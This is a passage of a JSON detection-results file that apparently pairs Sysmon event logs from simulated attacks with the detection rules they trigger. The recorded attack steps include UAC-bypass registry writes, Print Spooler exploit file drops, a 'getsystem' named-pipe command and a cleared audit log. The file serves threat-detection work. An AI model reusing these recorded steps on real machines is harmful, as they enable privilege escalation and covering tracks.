13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342302,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.563647Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File 
Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDNAMES.GPD","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342303,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.602658Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDDTYPE.GDL","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342304,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.602986Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler 
Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDSCHEM.GDL","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342305,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.603171Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDSCHMX.GDL","UtcTime":"2020-08-12 
13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342306,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.603794Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Old\\1","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342307,"Execution_attributes":{"ProcessID":3296,"ThreadID":4484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:04:27.622837Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Copy From or To System32"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /c copy Report.wer C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\a_b_c_d_e > nul 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\Public\\tools\\PrivEsc\\cve-2020-1337-poc-master\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-E911-5F33-0000-0020241C0400","LogonId":"0x41c24","OriginalFileName":"Cmd.Exe","ParentCommandLine":"WerTrigger.exe","ParentImage":"C:\\Users\\Public\\tools\\PrivEsc\\cve-2020-1337-poc-master\\WerTrigger.exe","ParentProcessGuid":"747F3D96-E938-5F33-0000-00109CA00E00","ParentProcessId":7820,"ProcessGuid":"747F3D96-E93A-5F33-0000-001014B30E00","ProcessId":7868,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-08-12 13:06:02.548"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":342413,"Execution_attributes":{"ProcessID":3344,"ThreadID":4176},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:06:02.552084Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-E909-5F33-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-E93C-5F33-0000-0010A6F00E00","ParentProcessId":8032,"ProcessGuid":"747F3D96-E940-5F33-0000-001039310F00","ProcessId":7460,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-08-12 13:06:08.141"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":342417,"Execution_attributes":{"ProcessID":3344,"ThreadID":4176},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-08-12T13:06:08.143703Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-6ABB-5EAD-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"powershell.exe","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-B592-5EAD-0000-0010D4CDC200","ParentProcessId":1428,"ProcessGuid":"747F3D96-B595-5EAD-0000-00106BFDC200","ProcessId":6004,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-02 18:01:57.417"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":110435,"Execution_attributes":{"ProcessID":3068,"ThreadID":2232},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-02T18:01:57.418442Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\windows\\system32\\cmd.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.18362.449 
(WinBuild.160101.0800)","Hashes":"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8C36-5F75-0000-002034E39103","LogonId":"0x391e334","OriginalFileName":"Cmd.Exe","ParentCommandLine":"\"C:\\Windows\\System32\\mmc.exe\" WF.msc","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"00247C92-9E03-5F7B-0000-0010A645272C","ParentProcessId":20228,"ProcessGuid":"00247C92-9E04-5F7B-0000-0010CF98272C","ProcessId":12876,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-10-05 22:28:20.529"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2164913,"Execution_attributes":{"ProcessID":5424,"ThreadID":6708},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-05T22:28:20.530062Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"\"C:\\Windows\\system32\\cmd.exe\"","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-5808-5D45-0000-00106CDC3E00","ProcessId":924,"RuleName":"PrivEsc - UAC bypass UACME-34","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\windir","UtcTime":"2019-08-03 
09:46:48.692"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5132,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-03T09:46:48.726304Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ProcessId":468,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\msdhch\\Start","UtcTime":"2019-04-30 07:46:15.168"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8573,"Execution_attributes":{"ProcessID":1876,"ThreadID":1444},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T07:46:15.199614Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"cmd.exe /c echo msdhch > \\\\.\\pipe\\msdhch","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ProcessId":468,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\msdhch\\ImagePath","UtcTime":"2019-04-30 
07:46:15.168"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8574,"Execution_attributes":{"ProcessID":1876,"ThreadID":1444},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T07:46:15.199614Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Meterpreter or Cobalt Strike Getsystem Service Start"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /c echo msdhch > \\\\.\\pipe\\msdhch","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-F6A1-5CC7-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ParentProcessId":468,"ProcessGuid":"365ABB72-FD47-5CC7-0000-00106AF61D00","ProcessId":4088,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 
07:46:15.183"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8575,"Execution_attributes":{"ProcessID":1876,"ThreadID":1444},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T07:46:15.215239Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-F6A1-5CC7-0000-001004550000","ProcessId":468,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\msdhch\\Start","UtcTime":"2019-04-30 07:46:15.230"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8576,"Execution_attributes":{"ProcessID":1876,"ThreadID":1444},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T07:46:15.246489Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 
12:32:34.721","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-7EE2-5D45-0000-00104E852801","ProcessId":5284,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\MSCOREE.DLL","UtcTime":"2019-08-03 12:32:34.721"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5494,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T12:32:34.875974Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"IEWIN7","Correlation":null,"EventID":1102,"EventRecordID":18195,"Execution_attributes":{"ProcessID":780,"ThreadID":3812},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-05-11T17:10:06.342445Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"IEWIN7","SubjectLogonId":"0x1371b","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3583694148-1414552638-2922671848-1000"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using 
MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-09 02:52:18.765","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-9570-5CD3-0000-00103FC90A00","ProcessId":1900,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\wscript.exe.manifest","UtcTime":"2019-05-09 02:52:18.765"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":11219,"Execution_attributes":{"ProcessID":1988,"ThreadID":228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-09T02:52:18.765888Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2018-01-03 01:21:25.726","Image":"C:\\Windows\\system32\\cmd.exe","ProcessGuid":"365ABB72-95E7-5CD3-0000-001046950F00","ProcessId":2812,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData:tghjx5xz2ky.vbs","UtcTime":"2019-05-09 
02:52:23.500"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":11241,"Execution_attributes":{"ProcessID":1988,"ThreadID":228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-09T02:52:23.500263Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass Using Registry Shell Open Keys","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"(Empty)","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-5E6A-5D45-0000-001076639D00","ProcessId":4440,"RuleName":"PrivEsc - UAC bypass UACME-33","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\ms-settings\\shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-03 10:14:02.848"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5272,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-03T10:14:02.929209Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass Using Registry Shell Open Keys","UAC Bypass via Event 
Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-5E6A-5D45-0000-001076639D00","ProcessId":4440,"RuleName":"PrivEsc - UAC bypass UACME-33","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\ms-settings\\shell\\open\\command\\(Default)","UtcTime":"2019-08-03 10:14:02.848"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5273,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-03T10:14:02.934826Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bypass UAC via Fodhelper.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\system32\\fodhelper.exe\" ","ParentImage":"C:\\Windows\\System32\\fodhelper.exe","ParentProcessGuid":"747F3D96-5E6F-5D45-0000-001014CA9D00","ParentProcessId":8180,"ProcessGuid":"747F3D96-5E70-5D45-0000-0010FCDD9D00","ProcessId":3656,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-03 10:14:08.401"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5277,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-03T10:14:08.472102Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Tool UACMe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\den\\Source\\Repos\\UACME\\Source\\Akagi\\output\\x64\\Release\\Akagi64.exe\" 64","Company":"Integrity Investment LLC","CurrentDirectory":"C:\\Users\\den\\Source\\Repos\\UACME\\Source\\Akagi\\output\\x64\\Release\\","Description":"Pentesting 